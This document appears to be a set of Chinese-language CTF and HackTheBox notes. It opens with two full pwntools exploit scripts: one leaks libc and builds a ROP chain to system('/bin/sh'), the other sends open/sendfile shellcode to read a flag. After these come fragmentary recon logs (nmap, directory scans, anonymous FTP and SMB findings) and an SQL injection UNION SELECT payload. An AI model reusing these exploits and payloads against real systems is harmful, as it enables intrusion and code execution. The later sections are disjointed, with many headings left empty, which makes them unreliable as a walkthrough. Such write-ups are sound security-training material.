Vpwn

可以改到计数器实现任意地址读写

写 int 有一定概率成功，要多试几次

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:X1NRI
import sys
import os
from pwn import*
from ctypes import*
#from LibcSearcher import LibcSearcher

def dbg(command): #dbg(None)
	if(len(sys.argv)!= 3):
		gdb.attach(io,gdbscript=command)
		#pause()
#------------------------------------------------------------------
def menu(num):
	sla('Enter your choice: ',str(num))

def edit(idx,value:int):
	menu(1)
	sla('Enter the index to edit (0-based): ',str(idx))
	sla('Enter the new value: ',str(value))

def push(value:int):
	menu(2)
	sla('Enter the value to push: ',str(value))

def pop():
	menu(3)
	
def show():
	menu(4)

def exit():
	menu(5)

def oow(idx,ptr):
	edit(idx,ptr&0xffffffff)
	edit(idx+1,ptr>>4*8)

def pwn():
	for i in range(6):
		push(1)
	
	push(0x20)
	#dbg('b *$rebase(0x00000000000015C1)')	#idx 0x7fffffffdd70
	dbg('b *$rebase(0x00000000000017D0)\nc\n') #edit_ret
	
	show()
	for i in range(20):
		ru(' ',True)
	
	
	part1=int(ru(' ',True),10) & 0xffffffff
	part2=int(ru(' ',True),10) & 0xffffffff


	leak=(part2<<4*8)+part1
	libc.address=leak-0x29d90
	lg("leak",leak)
	lg("libc",libc.address)
	

	system=ls('system')
	rdi=0x000000000002a3e5+libc.address
	binsh=0x00000000001d8678+libc.address
	ret=0x0000000000029139+libc.address
	
	
	lg('rdi',rdi)
	#push(0xdeadbeef)
	
	
	oow(18,rdi)
	oow(20,binsh)
	oow(22,ret)
	oow(24,system)
	#edit(19,0x7ffff7)
	
	exit()
	
	itr()
	
if __name__ == '__main__':
	context(os='linux',arch='amd64',bits=64,endian='little')
	context.terminal=["tmux","splitw","-h","-l 150"]
	binary='./pwn'
	context.log_level='debug'
	elf=ELF(binary)
	libc=elf.libc
	if(len(sys.argv) == 3):
		io = remote(sys.argv[1],sys.argv[2])
	else:
		io = process(binary)
	s	  = lambda payload		:io.send(payload)
	sl   = lambda payload		:io.sendline(payload)
	sa   = lambda data,payload	:io.sendafter(data,payload)
	sla  = lambda data,payload	:io.sendlineafter(data,payload)
	r    = lambda num   		   :io.recv(numb=num)
	ru   = lambda data,DROP		:io.recvuntil(data,drop=DROP)
	rl	  = lambda 				   :io.recvline(keepends=True)
	uu32 = lambda 				   :u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b"\x00") ) 
	uu64 = lambda 				   :u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00") )
	ep   = lambda data 			:elf.plt[data]
	eg   = lambda data 			:elf.got[data]
	es   = lambda data       	:elf.sym[data]
	ls   = lambda data 			:libc.sym[data]		
	itr  = lambda 				   :io.interactive()
	ic   = lambda 				   :io.close()
	pt   = lambda s				:log.info('\033[1;31;40m %s --- %s \033[0m' % (s,type(eval(s))))
	lg   = lambda name,addr 	:log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))

	pwn()

Heaven’s+door

限制了syscall的shellcode，只能两次syscall调用

不用绕过也可以，sendfile

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#@Author:X1NRI
import sys
import os
from pwn import*
from ctypes import*
#from LibcSearcher import LibcSearcher

def dbg(command): #dbg(None)
	if(len(sys.argv)!= 3):
		gdb.attach(io,gdbscript=command)
		#pause()
#------------------------------------------------------------------

def pwn(idx,ch):
	
	dbg('b *0x0000000000401709\n')
	bss=0x404000+0x400
	
	shellcode=asm(shellcraft.open('flag'))
	shellcode+=asm(shellcraft.sendfile(1,3,0,0x100))
	s(shellcode)
	

	itr()
	
if __name__ == '__main__':
	context(os='linux',arch='amd64',bits=64,endian='little')
	context.terminal=["tmux","splitw","-h","-l 150"]
	binary='./pwn'
	context.log_level='debug'
	elf=ELF(binary)
	libc=elf.libc
	if(len(sys.argv) == 3):
		io = remote(sys.argv[1],sys.argv[2])
	else:
		io = process(binary)
	s	  = lambda payload		:io.send(payload)
	sl   = lambda payload		:io.sendline(payload)
	sa   = lambda data,payload	:io.sendafter(data,payload)
	sla  = lambda data,payload	:io.sendlineafter(data,payload)
	r    = lambda num   		   :io.recv(numb=num)
	ru   = lambda data,DROP		:io.recvuntil(data,drop=DROP)
	rl	  = lambda 				   :io.recvline(keepends=True)
	uu32 = lambda 				   :u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b"\x00") ) 
	uu64 = lambda 				   :u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00") )
	ep   = lambda data 			:elf.plt[data]
	eg   = lambda data 			:elf.got[data]
	es   = lambda data       	:elf.sym[data]
	ls   = lambda data 			:libc.sym[data]		
	itr  = lambda 				   :io.interactive()
	ic   = lambda 				   :io.close()
	pt   = lambda s				:log.info('\033[1;31;40m %s --- %s \033[0m' % (s,type(eval(s))))
	lg   = lambda name,addr 	:log.success('\033[1;31;40m{} ==> {:#x}\033[0m'.format(name, addr))

	pwn(0,0x66)

babytrace

3解题

信息搜集

扫端口

是个域控

PORT      STATE    SERVICE       VERSION
25/tcp    open     smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp    open     domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-14 09:30:17Z)
110/tcp   open     tcpwrapped
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
514/tcp   filtered shell
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
1151/tcp  filtered unizensus
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49152/tcp open     msrpc         Microsoft Windows RPC
49153/tcp open     msrpc         Microsoft Windows RPC
49154/tcp open     msrpc         Microsoft Windows RPC
49155/tcp open     msrpc         Microsoft Windows RPC
49157/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open     msrpc         Microsoft Windows RPC
49165/tcp open     msrpc         Microsoft Windows RPC
50006/tcp filtered unknown
Aggressive OS guesses: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (95%), Microsoft Windows XP SP3 (92%), VMware Player virtual NAT device (92%), Actiontec MI424WR-GEN3I WAP (90%), DD-WRT v24-sp2 (Linux 2.4.37) (90%), Linux 4.4 (88%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=248 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-14T09:32:18
|_  start_date: 2025-01-14T04:08:46

再用enum4linux-ng枚举一波信息：

根域服务器，域名 active.htb，FQDN DC.active.htb，操作系统可能是Windows 7、Windows Server 2008 R2；同时SMB允许匿名登录：

入侵

SMB匿名登录

信息搜集

访问ip，是apache2的默认页面

扫端口

PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
25/tcp  open  tcpwrapped
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http       Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
110/tcp open  pop3?

扫目录

[16:29:27] Starting: 
[16:29:43] 403 -  276B  - /.ht_wsr.txt                                      
[16:29:43] 403 -  276B  - /.htaccess.bak1                                   
[16:29:43] 403 -  276B  - /.htaccess.orig                                   
[16:29:43] 403 -  276B  - /.htaccess.sample
[16:29:43] 403 -  276B  - /.htaccess.save                                   
[16:29:43] 403 -  276B  - /.htaccess_extra                                  
[16:29:43] 403 -  276B  - /.htaccessBAK
[16:29:43] 403 -  276B  - /.htaccess_sc
[16:29:43] 403 -  276B  - /.htaccessOLD
[16:29:43] 403 -  276B  - /.htaccess_orig
[16:29:43] 403 -  276B  - /.htaccessOLD2                                    
[16:29:43] 403 -  276B  - /.htm                                             
[16:29:43] 403 -  276B  - /.html
[16:29:43] 403 -  276B  - /.httr-oauth                                      
[16:29:43] 403 -  276B  - /.htpasswd_test
[16:29:43] 403 -  276B  - /.htpasswds                                       
[16:29:48] 403 -  276B  - /.php                                             
[16:31:51] 403 -  276B  - /server-status                                    
[16:31:51] 403 -  276B  - /server-status/                                   
                                                                             
Task Completed

打波poc

什么都没扫出来，但是我注意到一个奇怪的端口 161

入侵

研究-SNMP服务

题目描述：一个看似健康的IOT服务

基本信息

给了libc，libc2.33-0ubuntu5_amd64

逆向分析

• 主函数
  
  

• 处理请求正文
  

要注意的是其中有一个check：

这个全局变量默认为0

add : 1&index&size&content
edit : 2&index&content
show : 3&index
free : 4&index

信息搜集

初识

访问ip

上面的选项都点不了

扫端口

PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjEtN3+WZzlvu54zya9Q+D0d/jwjZT2jYFKwHe0icY7plEWSAqbP+b3ijRL6kv522KEJPHkfXuRwzt5z4CNpyUnqr6nQINn8DU0Iu/UQby+6OiQIleNUCYYaI+1mV0sm4kgmue4oVI1Q3JYOH41efTbGDFHiGSTY1lH3HcAvOFh75dCID0564T078p7ZEIoKRt1l7Yz+GeMZ870Nw13ao0QLPmq2HnpQS34K45zU0lmxIHqiK/IpFJOLfugiQF52Qt6+gX3FOjPgxk8rk81DEwicTrlir2gJiizAOchNPZjbDCnG2UqTapOm292Xg0hCE6H03Ri6GtYs5xVFw/KfGSGb7OJT1jhitbpUxRbyvP+pFy4/8u6Ty91s98bXrCyaEy2lyZh5hm7MN2yRsX+UbrSo98UfMbHkKnePg7/oBhGOOrUb77/DPePGeBF5AT029Xbz90v2iEFfPdcWj8SP/p2Fsn/qdutNQ7cRnNvBVXbNm0CpiNfoHBCBDJ1LR8p8k=
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGKC3ouVMPI/5R2Fsr5b0uUQGDrAa6ev8uKKp5x8wdqPXvM1tr4u0GchbVoTX5T/PfJFi9UpeDx/uokU3chqcFc=
|   256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJbkxEqMn++HZ2uEvM0lDZy+TB8B8IAeWRBEu3a34YIb
25/tcp    open     smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open     http            Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Emergent Medical Idea
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

扫目录

16:44:13] Starting: 
[16:44:25] 403 -  277B  - /.ht_wsr.txt                                      
[16:44:28] 403 -  277B  - /.htaccess_extra                                  
[16:44:28] 403 -  277B  - /.htaccessOLD                                     
[16:44:28] 403 -  277B  - /.htaccess.orig                                   
[16:44:28] 403 -  277B  - /.htaccessOLD2                                    
[16:44:28] 403 -  277B  - /.htaccess.sample                                 
[16:44:28] 403 -  277B  - /.htaccess.save
[16:44:28] 403 -  277B  - /.htaccessBAK
[16:44:28] 403 -  277B  - /.htaccess_orig
[16:44:28] 403 -  277B  - /.htm
[16:44:28] 403 -  277B  - /.htaccess_sc                                     
[16:44:28] 403 -  277B  - /.html
[16:44:28] 403 -  277B  - /.htaccess.bak1                                   
[16:44:28] 403 -  277B  - /.htpasswd_test                                   
[16:44:28] 403 -  277B  - /.htpasswds                                       
[16:44:28] 403 -  277B  - /.httr-oauth
[16:46:22] 403 -  277B  - /server-status                                    
[16:46:22] 403 -  277B  - /server-status/   

目录也没东西

打波poc

信息搜集

访问ip

在hosts添加两行

10.10.11.227 tickets.keeper.htb
10.10.11.227 keeper.htb

访问 tickets.keeper.htb/

访问一下 keeper.htb/， 就是之前跳转的界面

扫端口

先简单扫下端口

PORT      STATE    SERVICE
22/tcp    open     ssh
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
25/tcp    open     smtp
|_smtp-commands: Couldn't establish connection on port 25
37/tcp    filtered time
80/tcp    open     http
| http-methods:
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
110/tcp   open     pop3
125/tcp   filtered locus-map
444/tcp   filtered snpp
514/tcp   filtered shell
1105/tcp  filtered ftranhc
1233/tcp  filtered univ-appserver
1840/tcp  filtered netopia-vo2
2107/tcp  filtered msmq-mgmt
2251/tcp  filtered dif-port
2399/tcp  filtered fmpro-fdal
3827/tcp  filtered netmpi
3871/tcp  filtered avocent-adsap
5033/tcp  filtered jtnetd-server
5357/tcp  filtered wsdapi
5560/tcp  filtered isqlplus
5877/tcp  filtered unknown
5961/tcp  filtered unknown
6502/tcp  filtered netop-rc
7070/tcp  filtered realserver
8254/tcp  filtered unknown
9000/tcp  filtered cslistener
9002/tcp  filtered dynamid
9900/tcp  filtered iua
16113/tcp filtered unknown
22939/tcp filtered unknown
49999/tcp filtered unknown

入侵

信息搜集

80是个登录界面，PRTG？

扫端口

ORT      STATE    SERVICE        VERSION
21/tcp    open     ftp            Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
80/tcp    open     http           PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp   open     msrpc?
139/tcp   open     netbios-ssn?
445/tcp   open     microsoft-ds?
668/tcp   filtered mecomm
1051/tcp  filtered optima-vnet
1071/tcp  filtered bsquare-voip
3527/tcp  filtered beserver-msg-q
3809/tcp  filtered apocd
7019/tcp  filtered doceri-ctl
48080/tcp filtered unknown
49400/tcp filtered compaqdiag

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-12-28T14:09:28
|_  start_date: 2024-12-28T14:05:11
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

这一看ftp可以匿名登录

入侵

ftp 匿名登录

可以登录上去，不过权限较低，无法上传文件

发现iis的网站目录 inetpub/

但是进去发现什么都没有？

靶场地址：BUUCTF在线评测

level 1

GET传参 ?id=1

传参2回显不同，说明传入的参数是会进入数据库语句的

1' 单引号报错，这里有报错注入

1'--+

可以判断出是字符型且存在SQL注入

联合查询爆出列数，3列能正常回显

1'UNION SELECT 1,2,3--+